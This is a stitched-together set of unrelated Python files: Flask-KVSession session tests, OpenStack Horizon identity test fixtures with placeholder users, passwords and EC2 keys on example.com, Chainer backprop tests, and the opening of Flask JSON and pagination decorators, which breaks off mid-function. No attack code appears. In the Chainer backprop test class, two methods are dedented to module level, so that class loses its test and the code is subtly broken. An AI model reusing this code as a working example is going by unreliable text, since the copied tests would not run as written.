        time.sleep(2)
        self.app.kvsession.cleanup_sessions(self.app)
        self.assertEqual({}, self.store.d)
    def test_can_regenerate_session(self):
        self.client.get('/store-in-session/k1/value1/')
        self.assertEqual(1, len(self.store.d))
        key = self.store.d.keys()[0]
        # now regenerate: the store key must change, the data must not
        self.client.get('/regenerate-session/')
        self.assertEqual(1, len(self.store.d))
        new_key = self.store.d.keys()[0]
        self.assertNotEqual(new_key, key)
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
    def test_works_without_secret_key_if_session_not_used(self):
        self.app = create_app(self.store)
        self.app.config['TESTING'] = True
        self.client = self.app.test_client()
        self.client.get('/')
    def test_correct_error_reporting_with_no_secret_key(self):
        self.app = create_app(self.store)
        self.app.config['TESTING'] = True
        self.client = self.app.test_client()
        with self.assertRaises(RuntimeError):
            self.client.get('/store-in-session/k1/value1/')
    def test_can_store_datetime(self):
        rv = self.client.get('/store-datetime/')
        rv = self.client.get('/dump-datetime/')
        self.assertEqual(rv.data, '2011-08-10 15:46:00')
    def test_missing_session_causes_new_empty_session(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        self.store.d.clear()
        rv = self.client.get('/dump-session/')
        self.assertEqual(rv.data, '{}')
        rv = self.client.get('/is-kvsession/')
        self.assertEqual('True', rv.data)
    def test_manipulated_session_causes_new_empty_session(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        cookie = self.get_session_cookie()
        cookie.value += 'x'
        rv = self.client.get('/dump-session/')
        self.assertEqual(rv.data, '{}')
        rv = self.client.get('/is-kvsession/')
        self.assertEqual('True', rv.data)
    def test_expired_session_causes_new_empty_session(self):
        self.app.permanent_session_lifetime = timedelta(seconds=1)
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/make-session-permanent/')
        # assert that the session has a non-zero timestamp
        sid, created = self.split_cookie(rv)
        self.assertNotEqual(0, int(created, 16))
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        # sleep two seconds
        time.sleep(2)
        # we should have a new session now
        rv = self.client.get('/is-new-session/')
        self.assertEqual(str(True), rv.data)
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s, {})
    def test_expired_made_permanent_causes_no_exception(self):
        self.app.permanent_session_lifetime = timedelta(seconds=1)
        rv = self.client.get('/store-in-session/k1/value1/')
        # sleep two seconds
        time.sleep(2)
        rv = self.client.get('/make-session-permanent/')
    def test_permanent_session_cookies_are_permanent(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        sid, created = self.split_cookie(rv)
        # session cookie
        self.assertIsNone(self.get_session_cookie().expires)
        rv = self.client.get('/make-session-permanent/')
        # now it needs to be permanent
        self.assertIsNotNone(self.get_session_cookie().expires)
    def test_new_delayed_construction(self):
        app = Flask(__name__)
        ext = KVSessionExtension()
        with self.assertRaises(ValueError):
            ext.init_app(app)
        ext.init_app(app, self.store)
        self.assertIs(self.store, app.kvsession_store)
    def test_new_delayed_construction_with_default(self):
        app = Flask(__name__)
        ext = KVSessionExtension(self.store)
        ext.init_app(app)
        self.assertIs(self.store, app.kvsession_store)
# the code below should, in theory, trigger the problem of regenerating a
# session before it has been created, however, it doesn't
class TestFirstRequestRegenerate(unittest.TestCase):
    """Regression check: regenerating a session on the very first request
    must not raise."""
    def test_first_request(self):
        session_store = DictStore()
        flask_app = Flask(__name__)
        flask_app.config['SECRET_KEY'] = 'topsecret'
        KVSessionExtension(session_store, flask_app)

        @flask_app.route('/')
        def index():
            session.regenerate()
            return 'OK'

        flask_app.test_client().get('/')
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from datetime import timedelta # noqa
from django.conf import settings
from django.utils import datetime_safe
from keystoneclient import access
from keystoneclient.v2_0 import ec2
from keystoneclient.v2_0 import roles
from keystoneclient.v2_0 import tenants
from keystoneclient.v2_0 import users
from keystoneclient.v3 import domains
from keystoneclient.v3 import groups
from openstack_auth import user as auth_user
from openstack_dashboard.test.test_data import utils
# Dummy service catalog with all services.
# All endpoint URLs should point to example.com.
# Try to keep them as accurate to real data as possible (ports, URIs, etc.)
SERVICE_CATALOG = [
{"type": "compute",
"name": "nova",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.nova.example.com:8774/v2",
"internalURL": "http://int.nova.example.com:8774/v2",
"publicURL": "http://public.nova.example.com:8774/v2"},
{"region": "RegionTwo",
"adminURL": "http://admin.nova2.example.com:8774/v2",
"internalURL": "http://int.nova2.example.com:8774/v2",
"publicURL": "http://public.nova2.example.com:8774/v2"}]},
{"type": "volume",
"name": "cinder",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.nova.example.com:8776/v1",
"internalURL": "http://int.nova.example.com:8776/v1",
"publicURL": "http://public.nova.example.com:8776/v1"},
{"region": "RegionTwo",
"adminURL": "http://admin.nova.example.com:8776/v1",
"internalURL": "http://int.nova.example.com:8776/v1",
"publicURL": "http://public.nova.example.com:8776/v1"}]},
{"type": "image",
"name": "glance",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.glance.example.com:9292/v1",
"internalURL": "http://int.glance.example.com:9292/v1",
"publicURL": "http://public.glance.example.com:9292/v1"}]},
{"type": "identity",
"name": "keystone",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.keystone.example.com:35357/v2.0",
"internalURL": "http://int.keystone.example.com:5000/v2.0",
"publicURL": "http://public.keystone.example.com:5000/v2.0"}]},
{"type": "object-store",
"name": "swift",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.swift.example.com:8080/",
"internalURL": "http://int.swift.example.com:8080/",
"publicURL": "http://public.swift.example.com:8080/"}]},
{"type": "network",
"name": "neutron",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.neutron.example.com:9696/",
"internalURL": "http://int.neutron.example.com:9696/",
"publicURL": "http://public.neutron.example.com:9696/"}]},
{"type": "ec2",
"name": "EC2 Service",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.nova.example.com:8773/services/Admin",
"publicURL": "http://public.nova.example.com:8773/services/Cloud",
"internalURL": "http://int.nova.example.com:8773/services/Cloud"}]},
{"type": "metering",
"name": "ceilometer",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.ceilometer.example.com:8777",
"publicURL": "http://public.ceilometer.example.com:8777",
"internalURL": "http://int.ceilometer.example.com:8777"}]},
{"type": "orchestration",
"name": "Heat",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.heat.example.com:8004/v1",
"publicURL": "http://public.heat.example.com:8004/v1",
"internalURL": "http://int.heat.example.com:8004/v1"}]},
{"type": "database",
"name": "Trove",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.trove.example.com:8779/v1.0",
"publicURL": "http://public.trove.example.com:8779/v1.0",
"internalURL": "http://int.trove.example.com:8779/v1.0"}]},
{"type": "auditlog",
"name": "Auditlog",
"endpoints_links": [],
"endpoints": [
{"region": "RegionOne",
"adminURL": "http://admin.auditlog.example.com:9090",
"publicURL": "http://public.auditlog.example.com:9090",
"internalURL": "http://int.auditlog.example.com:9090"}]}
]
def data(TEST):
    """Populate 'TEST' with dummy identity (keystone) test data.

    Fills containers for tokens, domains, users, groups, tenants, roles
    and EC2 credentials, and sets "current" convenience attributes
    (TEST.user, TEST.tenant, TEST.token, TEST.domain, ...).
    """
    # Make a deep copy of the catalog to avoid persisting side-effects
    # when tests modify the catalog.
    TEST.service_catalog = copy.deepcopy(SERVICE_CATALOG)
    TEST.tokens = utils.TestDataContainer()
    TEST.domains = utils.TestDataContainer()
    TEST.users = utils.TestDataContainer()
    TEST.groups = utils.TestDataContainer()
    TEST.tenants = utils.TestDataContainer()
    TEST.roles = utils.TestDataContainer()
    TEST.ec2 = utils.TestDataContainer()
    # Roles: one admin role and one default member role.
    admin_role_dict = {'id': '1',
                       'name': 'admin'}
    admin_role = roles.Role(roles.RoleManager, admin_role_dict)
    member_role_dict = {'id': "2",
                        'name': settings.OPENSTACK_KEYSTONE_DEFAULT_ROLE}
    member_role = roles.Role(roles.RoleManager, member_role_dict)
    TEST.roles.add(admin_role, member_role)
    TEST.roles.admin = admin_role
    TEST.roles.member = member_role
    # Domains: one enabled, one disabled.
    domain_dict = {'id': "1",
                   'name': 'test_domain',
                   'description': "a test domain.",
                   'enabled': True}
    domain_dict_2 = {'id': "2",
                     'name': 'disabled_domain',
                     'description': "a disabled test domain.",
                     'enabled': False}
    domain = domains.Domain(domains.DomainManager, domain_dict)
    disabled_domain = domains.Domain(domains.DomainManager, domain_dict_2)
    TEST.domains.add(domain, disabled_domain)
    TEST.domain = domain  # Your "current" domain
    # Users: five users spread over the two domains; user5 has no email.
    user_dict = {'id': "1",
                 'name': 'test_user',
                 'email': 'test@example.com',
                 'password': 'password',
                 'token': 'test_token',
                 'project_id': '1',
                 'enabled': True,
                 'domain_id': "1"}
    user = users.User(None, user_dict)
    user_dict = {'id': "2",
                 'name': 'user_two',
                 'email': 'two@example.com',
                 'password': 'password',
                 'token': 'test_token',
                 'project_id': '1',
                 'enabled': True,
                 'domain_id': "1"}
    user2 = users.User(None, user_dict)
    user_dict = {'id': "3",
                 'name': 'user_three',
                 'email': 'three@example.com',
                 'password': 'password',
                 'token': 'test_token',
                 'project_id': '1',
                 'enabled': True,
                 'domain_id': "1"}
    user3 = users.User(None, user_dict)
    user_dict = {'id': "4",
                 'name': 'user_four',
                 'email': 'four@example.com',
                 'password': 'password',
                 'token': 'test_token',
                 'project_id': '2',
                 'enabled': True,
                 'domain_id': "2"}
    user4 = users.User(None, user_dict)
    user_dict = {'id': "5",
                 'name': 'user_five',
                 'email': None,
                 'password': 'password',
                 'token': 'test_token',
                 'project_id': '2',
                 'enabled': True,
                 'domain_id': "1"}
    user5 = users.User(None, user_dict)
    TEST.users.add(user, user2, user3, user4, user5)
    TEST.user = user  # Your "current" user
    TEST.user.service_catalog = copy.deepcopy(SERVICE_CATALOG)
    # Groups: four groups across both domains.
    group_dict = {'id': "1",
                  'name': 'group_one',
                  'description': 'group one description',
                  'project_id': '1',
                  'domain_id': '1'}
    group = groups.Group(groups.GroupManager(None), group_dict)
    group_dict = {'id': "2",
                  'name': 'group_two',
                  'description': 'group two description',
                  'project_id': '1',
                  'domain_id': '1'}
    group2 = groups.Group(groups.GroupManager(None), group_dict)
    group_dict = {'id': "3",
                  'name': 'group_three',
                  'description': 'group three description',
                  'project_id': '1',
                  'domain_id': '1'}
    group3 = groups.Group(groups.GroupManager(None), group_dict)
    group_dict = {'id': "4",
                  'name': 'group_four',
                  'description': 'group four description',
                  'project_id': '2',
                  'domain_id': '2'}
    group4 = groups.Group(groups.GroupManager(None), group_dict)
    TEST.groups.add(group, group2, group3, group4)
    # Tenants: enabled, disabled, and one with a unicode name.
    tenant_dict = {'id': "1",
                   'name': 'test_tenant',
                   'description': "a test tenant.",
                   'enabled': True,
                   'domain_id': '1',
                   'domain_name': 'test_domain'}
    tenant_dict_2 = {'id': "2",
                     'name': 'disabled_tenant',
                     'description': "a disabled test tenant.",
                     'enabled': False,
                     'domain_id': '2',
                     'domain_name': 'disabled_domain'}
    tenant_dict_3 = {'id': "3",
                     'name': u'\u4e91\u89c4\u5219',
                     'description': "an unicode-named tenant.",
                     'enabled': True,
                     'domain_id': '2',
                     'domain_name': 'disabled_domain'}
    tenant = tenants.Tenant(tenants.TenantManager, tenant_dict)
    disabled_tenant = tenants.Tenant(tenants.TenantManager, tenant_dict_2)
    tenant_unicode = tenants.Tenant(tenants.TenantManager, tenant_dict_3)
    TEST.tenants.add(tenant, disabled_tenant, tenant_unicode)
    TEST.tenant = tenant  # Your "current" tenant
    # Tokens: one scoped (to the tenant above) and one unscoped, both
    # expiring tomorrow.
    tomorrow = datetime_safe.datetime.now() + timedelta(days=1)
    expiration = tomorrow.isoformat()
    scoped_token_dict = {
        'access': {
            'token': {
                'id': "test_token_id",
                'expires': expiration,
                'tenant': tenant_dict,
                'tenants': [tenant_dict]},
            'user': {
                'id': "test_user_id",
                'name': "test_user",
                'roles': [member_role_dict]},
            'serviceCatalog': TEST.service_catalog
        }
    }
    scoped_access_info = access.AccessInfo.factory(resp=None,
                                                   body=scoped_token_dict)
    unscoped_token_dict = {
        'access': {
            'token': {
                'id': "test_token_id",
                'expires': expiration},
            'user': {
                'id': "test_user_id",
                'name': "test_user",
                'roles': [member_role_dict]},
            'serviceCatalog': TEST.service_catalog
        }
    }
    unscoped_access_info = access.AccessInfo.factory(resp=None,
                                                     body=unscoped_token_dict)
    scoped_token = auth_user.Token(scoped_access_info)
    unscoped_token = auth_user.Token(unscoped_access_info)
    TEST.tokens.add(scoped_token, unscoped_token)
    TEST.token = scoped_token  # your "current" token.
    TEST.tokens.scoped_token = scoped_token
    TEST.tokens.unscoped_token = unscoped_token
    # EC2 credentials.
    access_secret = ec2.EC2(ec2.CredentialsManager, {"access": "access",
                                                     "secret": "secret"})
    TEST.ec2.add(access_secret)
| |
import unittest
import numpy
import chainer
from chainer import testing
import chainer.testing.backend
import chainerx
def _get_expected_xp(backend_config, is_function):
    """Return a pair of xp modules expected in forward() and backward().

    For ChainerX backends, forward() sees the fallback device's module.
    An old-style chainer.Function also sees the fallback module in
    backward(), while a chainer.FunctionNode sees the backend's own xp.
    """
    xp = backend_config.xp
    if xp is chainerx:
        forward_xp = backend_config.device.fallback_device.xp
    else:
        forward_xp = xp
    backward_xp = forward_xp if is_function else xp
    return forward_xp, backward_xp
@testing.parameterize(*testing.product({
'function_node': [True, False],
}))
@testing.backend.inject_backend_tests(
None,
[
# CPU
{},
# CUDA
{'use_cuda': True, 'cuda_device': 0},
{'use_cuda': True, 'cuda_device': 1},
# ChainerX
{'use_chainerx': True, 'chainerx_device': 'native:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:0'},
{'use_chainerx': True, 'chainerx_device': 'cuda:1'},
])
class TestFunctionBackprop(unittest.TestCase):
    def call_func_function(self, backend_config, x1, x2, x3):
        """Apply an old-style chainer.Function that asserts, via the
        expected xp modules, which array types forward() and backward()
        receive, including attribute-fallback behavior."""
        forward_xp, backward_xp = _get_expected_xp(backend_config, True)
        class Func(chainer.Function):
            def __init__(self):
                # Array created before forward(); used to check attribute
                # fallback in both passes.
                self.array_init = backend_config.device.send(
                    numpy.array([3], numpy.float32))
            def forward(self, inputs):
                # Inputs
                assert isinstance(inputs, tuple)
                # x1, x3: float32
                # x2: int32
                x1, x2, x3 = inputs
                assert isinstance(x1, forward_xp.ndarray)
                assert isinstance(x2, forward_xp.ndarray)
                assert isinstance(x3, forward_xp.ndarray)
                # attribute fallback
                assert isinstance(self.array_init, forward_xp.ndarray)
                self.array_forward = forward_xp.array([2], numpy.float32)
                assert isinstance(self.array_forward, forward_xp.ndarray)
                y1 = x2 - 1  # int32
                y2 = x1 * x3 + x2.astype(x1.dtype)
                y3 = x1 + x3
                self.retain_inputs((0, 2))
                self.retain_outputs((0, 1,))
                return y1, y2, y3
            def backward(self, inputs, grad_outputs):
                # Retained inputs
                assert isinstance(inputs, tuple)
                x1, x2, x3 = inputs
                assert isinstance(x1, backward_xp.ndarray)
                assert x2 is None  # not retained
                assert isinstance(x3, backward_xp.ndarray)
                # Output gradients
                assert isinstance(grad_outputs, tuple)
                gy1, gy2, gy3 = grad_outputs
                assert gy1 is None  # y1 is int32
                # y3 is disconnected
                # TODO(niboshi): Expression after "or" is workaround for
                # chainerx. ChainerX backward should return None for
                # disconnected output and this workaround should be removed.
                assert (gy3 is None
                        or (float(gy3.max()) == 0
                            and float((-gy3).max()) == 0))
                # Retained outputs
                output_data = self.output_data
                assert isinstance(output_data, tuple)
                y1, y2, y3 = output_data
                assert isinstance(y1, backward_xp.ndarray)
                assert isinstance(y2, backward_xp.ndarray)
                assert y3 is None
                # attribute fallback
                assert isinstance(self.array_init, backward_xp.ndarray)
                assert isinstance(self.array_forward, backward_xp.ndarray)
                self.array_backward = backward_xp.array([4], numpy.float32)
                assert isinstance(self.array_backward, backward_xp.ndarray)
                gx1 = x3 * gy2  # + gy3
                gx2 = None
                gx3 = x1 * gy2  # + gy3
                return gx1, gx2, gx3
        return Func()(x1, x2, x3)
    def call_func_function_node(self, backend_config, x1, x2, x3):
        """Apply a chainer.FunctionNode mirroring call_func_function,
        using the FunctionNode retention/gradient API instead."""
        forward_xp, backward_xp = _get_expected_xp(backend_config, False)
        class Func(chainer.FunctionNode):
            def __init__(self):
                # Array created before forward(); used to check attribute
                # fallback in both passes.
                self.array_init = backend_config.device.send(
                    numpy.array([3], numpy.float32))
            def forward(self, inputs):
                # Inputs
                # x1, x3: float32
                # x2: int32
                x1, x2, x3 = inputs
                assert isinstance(x1, forward_xp.ndarray)
                assert isinstance(x2, forward_xp.ndarray)
                assert isinstance(x3, forward_xp.ndarray)
                # attribute fallback
                assert isinstance(self.array_init, forward_xp.ndarray)
                self.array_forward = forward_xp.array([2], numpy.float32)
                assert isinstance(self.array_forward, forward_xp.ndarray)
                y1 = x2 - 1  # int32
                y2 = x1 * x3 + x2.astype(x1.dtype)
                y3 = x1 + x3
                self.retain_inputs((0, 2))
                self.retain_outputs((0, 1,))
                return y1, y2, y3
            def backward(self, input_indexes, grad_outputs):
                # Input indexes
                assert isinstance(input_indexes, tuple)
                assert input_indexes == (0, 2)
                # Retained inputs
                retained_inputs = self.get_retained_inputs()
                assert isinstance(retained_inputs, tuple)
                x1, x3 = retained_inputs
                assert isinstance(x1.array, backward_xp.ndarray)
                assert isinstance(x3.array, backward_xp.ndarray)
                # Output gradients
                assert isinstance(grad_outputs, tuple)
                gy1, gy2, gy3 = grad_outputs
                assert gy1 is None  # y1 is int32
                assert isinstance(gy2.array, backward_xp.ndarray)
                # y3 is disconnected
                # TODO(niboshi): Expression after "or" is workaround for
                # chainerx. ChainerX backward should return None for
                # disconnected output and this workaround should be removed.
                assert (gy3 is None
                        or (float(gy3.array.max()) == 0
                            and float((-gy3.array).max()) == 0))
                # Retained outputs
                retained_outputs = self.get_retained_outputs()
                assert isinstance(retained_outputs, tuple)
                y1, y2, = retained_outputs
                assert isinstance(y1.array, backward_xp.ndarray)
                assert isinstance(y2.array, backward_xp.ndarray)
                # attribute fallback
                assert isinstance(self.array_init, backward_xp.ndarray)
                assert isinstance(self.array_forward, backward_xp.ndarray)
                self.array_backward = backward_xp.array([4], numpy.float32)
                assert isinstance(self.array_backward, backward_xp.ndarray)
                gx1 = x3 * gy2  # + gy3
                gx2 = None
                gx3 = x1 * gy2  # + gy3
                return gx1, gx2, gx3
        return Func().apply((x1, x2, x3))
def call_func(self, backend_config, x1, x2, x3):
    """Dispatch to the FunctionNode or old-style Function implementation."""
    impl = (
        self.call_func_function_node
        if self.function_node
        else self.call_func_function)
    return impl(backend_config, x1, x2, x3)
def test_backprop(self, backend_config):
    # End-to-end check: forward and backward through the test function,
    # asserting outputs and gradients land on the configured backend.
    x1_arr = numpy.array([2, 3], numpy.float32)
    x2_arr = numpy.array([3, 1], numpy.int32)
    x3_arr = numpy.array([5, 2], numpy.float32)
    gy2_arr = numpy.array([2, 4], numpy.float32)
    x1_arr, x2_arr, x3_arr, gy2_arr = backend_config.get_array(
        (x1_arr, x2_arr, x3_arr, gy2_arr))
    x1 = chainer.Variable(x1_arr)
    x2 = chainer.Variable(x2_arr, requires_grad=False)  # int32 input
    x3 = chainer.Variable(x3_arr)
    # Forward
    y1, y2, y3 = self.call_func(backend_config, x1, x2, x3)
    assert isinstance(y1.array, backend_config.xp.ndarray)
    assert isinstance(y2.array, backend_config.xp.ndarray)
    assert isinstance(y3.array, backend_config.xp.ndarray)
    # Backward, seeded only through y2.
    y2.grad = gy2_arr
    y2.backward()
    assert isinstance(x1.grad, backend_config.xp.ndarray)
    assert x2.grad is None  # requires_grad=False
    assert isinstance(x3.grad, backend_config.xp.ndarray)
@testing.parameterize(*testing.product({
    'function_node': [True, False],
}))
@testing.backend.inject_backend_tests(
    None,
    [
        # CPU
        {},
        # CUDA
        {'use_cuda': True, 'cuda_device': 0},
        {'use_cuda': True, 'cuda_device': 1},
        # ChainerX
        {'use_chainerx': True, 'chainerx_device': 'native:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:1'},
    ])
class TestFunctionInputNone(unittest.TestCase):
    """Tests that functions accept ``None`` inputs and that both forward
    and backward observe them as ``None`` on every backend."""

    def call_func_function(self, backend_config, x2):
        # Old-style chainer.Function whose first and third inputs are None.
        forward_xp, backward_xp = _get_expected_xp(backend_config, True)

        class Func(chainer.Function):
            def forward(self, inputs):
                # Inputs
                assert isinstance(inputs, tuple)
                x1, x2, x3 = inputs
                assert x1 is None
                assert isinstance(x2, forward_xp.ndarray)
                assert x3 is None
                y1 = x2 * 3
                self.retain_inputs((1, 2))
                self.retain_outputs(())
                return y1,

            def backward(self, inputs, grad_outputs):
                # Retained inputs
                assert isinstance(inputs, tuple)
                x1, x2, x3 = inputs
                assert x1 is None
                assert isinstance(x2, backward_xp.ndarray)
                assert x3 is None
                # Output gradients
                assert isinstance(grad_outputs, tuple)
                gy1, = grad_outputs
                assert isinstance(gy1, backward_xp.ndarray)
                # Retained outputs (nothing retained, so data is None)
                output_data = self.output_data
                assert isinstance(output_data, tuple)
                y1, = output_data
                assert y1 is None
                gx2 = 3 * gy1
                return None, gx2, None

        return Func()(None, x2, None),

    def call_func_function_node(self, backend_config, x2):
        # chainer.FunctionNode variant of the same None-input check.
        forward_xp, backward_xp = _get_expected_xp(backend_config, False)

        class Func(chainer.FunctionNode):
            def forward(self, inputs):
                # Inputs
                x1, x2, x3 = inputs
                assert x1 is None
                assert isinstance(x2, forward_xp.ndarray)
                assert x3 is None
                y1 = x2 * 3
                self.retain_inputs((1, 2))
                self.retain_outputs(())
                return y1,

            def backward(self, input_indexes, grad_outputs):
                # Input indexes: only x2 requires grad.
                assert isinstance(input_indexes, tuple)
                assert input_indexes == (1,)
                # Retained inputs
                retained_inputs = self.get_retained_inputs()
                assert isinstance(retained_inputs, tuple)
                x2, x3 = retained_inputs
                assert isinstance(x2.array, backward_xp.ndarray)
                assert x3 is None
                # Output grads
                assert isinstance(grad_outputs, tuple)
                gy1, = grad_outputs
                assert isinstance(gy1.array, backward_xp.ndarray)
                # Retained outputs.
                # Bugfix: compare with ``==`` rather than ``is`` — identity
                # of an empty-tuple literal is an interning detail and emits
                # a SyntaxWarning on Python 3.8+.
                retained_outputs = self.get_retained_outputs()
                assert retained_outputs == ()
                gx2 = 3 * gy1
                return None, gx2, None

        return Func().apply((None, x2, None))

    def call_func(self, backend_config, x1):
        # Dispatch on the parameterized implementation style.
        if self.function_node:
            return self.call_func_function_node(backend_config, x1)
        else:
            return self.call_func_function(backend_config, x1)

    def test_backprop(self, backend_config):
        x2_arr = numpy.array([2, 3], numpy.float32)
        gy1_arr = numpy.array([2, 4], numpy.float32)
        x2_arr, gy1_arr = backend_config.get_array((x2_arr, gy1_arr))
        x2 = chainer.Variable(x2_arr, requires_grad=True)
        # Forward
        y1, = self.call_func(backend_config, x2)
        assert isinstance(y1.array, backend_config.xp.ndarray)
        # Backward
        y1.grad = gy1_arr
        y1.backward()
        assert isinstance(x2.grad, backend_config.xp.ndarray)
@testing.parameterize(*testing.product({
    'function_node': [True, False],
}))
@testing.backend.inject_backend_tests(
    None,
    [
        # CPU
        {},
        # CUDA
        {'use_cuda': True, 'cuda_device': 0},
        {'use_cuda': True, 'cuda_device': 1},
        # ChainerX
        {'use_chainerx': True, 'chainerx_device': 'native:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:1'},
    ])
class TestFunctionOutputNone(unittest.TestCase):
    # Tests that functions may return None outputs and that backward
    # observes the corresponding gradients/retained data as None.

    def call_func_function(self, backend_config, x1):
        # Old-style chainer.Function returning (None, y2, None).
        forward_xp, backward_xp = _get_expected_xp(backend_config, True)

        class Func(chainer.Function):
            def forward(self, inputs):
                # Inputs
                assert isinstance(inputs, tuple)
                x1, = inputs
                assert isinstance(x1, forward_xp.ndarray)
                y2 = x1 * 3 + 2
                self.retain_inputs(())
                self.retain_outputs((1, 2,))
                return None, y2, None

            def backward(self, inputs, grad_outputs):
                # Retained inputs (nothing retained -> None)
                assert isinstance(inputs, tuple)
                x1, = inputs
                assert x1 is None
                # Output gradients; only y2 carries a gradient.
                assert isinstance(grad_outputs, tuple)
                gy1, gy2, gy3 = grad_outputs
                assert gy1 is None
                assert isinstance(gy2, backward_xp.ndarray)
                assert gy3 is None
                # Retained outputs
                output_data = self.output_data
                assert isinstance(output_data, tuple)
                assert len(output_data) == 3
                y1, y2, y3 = output_data
                assert y1 is None
                assert isinstance(y2, backward_xp.ndarray)
                assert y3 is None
                gx1 = 3 * gy2
                return gx1,

        return Func()(x1)

    def call_func_function_node(self, backend_config, x1):
        # chainer.FunctionNode variant of the same None-output check.
        forward_xp, backward_xp = _get_expected_xp(backend_config, False)

        class Func(chainer.FunctionNode):
            def forward(self, inputs):
                # Inputs
                x1, = inputs
                assert isinstance(x1, forward_xp.ndarray)
                y2 = x1 * 3 + 2
                self.retain_outputs((1, 2))
                return None, y2, None

            def backward(self, input_indexes, grad_outputs):
                # Input indexes
                assert isinstance(input_indexes, tuple)
                assert input_indexes == (0,)
                # Retained inputs (none retained)
                retained_inputs = self.get_retained_inputs()
                assert isinstance(retained_inputs, tuple)
                assert retained_inputs == ()
                # Output grads; only y2 carries a gradient.
                assert isinstance(grad_outputs, tuple)
                gy1, gy2, gy3 = grad_outputs
                assert gy1 is None
                assert isinstance(gy2.array, backward_xp.ndarray)
                assert gy3 is None
                # Retained outputs: indices (1, 2); y3 was None in forward.
                retained_outputs = self.get_retained_outputs()
                assert isinstance(retained_outputs, tuple)
                y2, y3 = retained_outputs
                assert y3 is None
                assert isinstance(y2.array, backward_xp.ndarray)
                gx1 = 3 * gy2
                return gx1,

        return Func().apply((x1,))

    def call_func(self, backend_config, x1):
        # Dispatch on the parameterized implementation style.
        if self.function_node:
            return self.call_func_function_node(backend_config, x1)
        else:
            return self.call_func_function(backend_config, x1)

    def test_backprop(self, backend_config):
        x1_arr = numpy.array([2, 3], numpy.float32)
        gy2_arr = numpy.array([2, 4], numpy.float32)
        x1_arr, gy2_arr = backend_config.get_array((x1_arr, gy2_arr))
        x1 = chainer.Variable(x1_arr, requires_grad=True)
        # Forward: y1 and y3 are None outputs.
        y1, y2, y3 = self.call_func(backend_config, x1)
        assert y1.array is None
        assert isinstance(y2.array, backend_config.xp.ndarray)
        assert y3.array is None
        # Backward through the only real output.
        y2.grad = gy2_arr
        y2.backward()
        assert isinstance(x1.grad, backend_config.xp.ndarray)
testing.run_module(__name__, __file__)
| |
"""
Copyright (c) 2014 Miguel Grinberg
Copyright (c) 2015 Alexandru Ciobanu
"""
from datetime import timedelta
import functools
from time import time
from threading import Thread
from werkzeug.wrappers import Response
from flask import jsonify, url_for, request, make_response, current_app
from flask import g, abort
from flask_login import current_user
from app.models import Permission
def json_response(f):
    """A decorator without arguments.

    Converts the wrapped view's return value — a dict, a serializable
    model, or a ``(body, status, headers)`` tuple — into a JSON response.
    ``Response`` objects (e.g. redirects) are passed through untouched.

    :param func f: view function to wrap
    :return: wrapped view
    :rtype: func
    """
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        # Bugfix: the two implicitly-concatenated literals were missing a
        # separating space, producing "deprecated.Please" in the log.
        current_app.log.warn(
            'Using the json_response decorator is deprecated. '
            'Please use app.core.ApiResponse.')
        # invoke the wrapped function
        rv = f(*args, **kwargs)
        # wrapped function is a redirect:
        # return it without doing anything
        if isinstance(rv, Response):
            return rv
        # the wrapped function can return the dictionary alone,
        # or can also include a status code and/or headers.
        # here we separate all these items
        status_or_headers = None
        headers = None
        if isinstance(rv, tuple):
            # pad to exactly (body, status_or_headers, headers)
            rv, status_or_headers, headers = rv + (None, ) * (3 - len(rv))
        if isinstance(status_or_headers, (dict, list)):
            # second element was actually headers, not a status code
            headers, status_or_headers = status_or_headers, None
        # if the response was a database model, then convert it to a
        # dictionary
        if not isinstance(rv, dict):
            rv = rv.serialize()
        # generate the JSON response
        rv = jsonify(rv)
        if status_or_headers is not None:
            rv.status_code = status_or_headers
        if headers is not None:
            rv.headers.extend(headers)
        return rv
    return wrapped
def paginate(f=None, *, max_per_page=20, headers_prefix='DO-'):
    """Pagination decorator.
    Generate a paginated response for a resource collection.
    Routes that use this decorator must return a SQLAlchemy query as a
    response.
    :param f: function to be decorated
    :param max_per_page: Items per page
    :param headers_prefix: Prefix for custom headers
    :return: tuple as (response, headers)
    """
    # Called with arguments (@paginate(max_per_page=...)): return a
    # partial so the next call receives the actual function.
    if f is None:
        return functools.partial(paginate,
                                 max_per_page=max_per_page,
                                 headers_prefix=headers_prefix)

    @functools.wraps(f)
    def wrapped(*args, **kwargs):
